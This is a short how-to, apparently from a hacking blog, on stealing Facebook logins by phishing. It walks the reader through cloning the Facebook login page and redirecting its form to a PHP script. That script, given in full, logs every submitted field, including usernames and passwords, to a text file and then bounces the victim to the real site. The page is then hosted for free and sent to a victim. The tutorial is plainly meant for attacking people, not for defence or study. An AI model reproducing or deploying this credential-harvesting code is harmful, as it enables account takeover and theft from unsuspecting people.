Phishing is one of easyest method of hacking facebook account. In this method we simply create a fake page of the website and upload on a free webshosting account then send it to victim. When he/she login through your fake page password and username come in your account and easly open account.
Download complete fileLets start:-
1) Open facebook and press ctrl+u for page sourse and save it as index.php.
3) Find action="..." by press ctrl+f.
4)Edit this line with phishing.php and save this.
5) Now we have to create phishing.php page copy this code.
<?php
header ('Location:http://www.facebook.com/');
$handle = fopen("usernames.txt","a");
foreach($_POST as $variable =>$value){
fwrite($handle,$variable);
fwrite($handle,"=");
fwrite($handle,$value);
fwrite($handle,"\r\n");
}
fwrite($handle,"\r\n");
fclose($handle);
exit;
?>
6) You have to create a blank notepad file namded usernames.txt
7) You are ready to upload your file on free webhosting website.
8) After uploading you have your web address give this to your victim and when they login through this you got their username and password in your username.txt file.


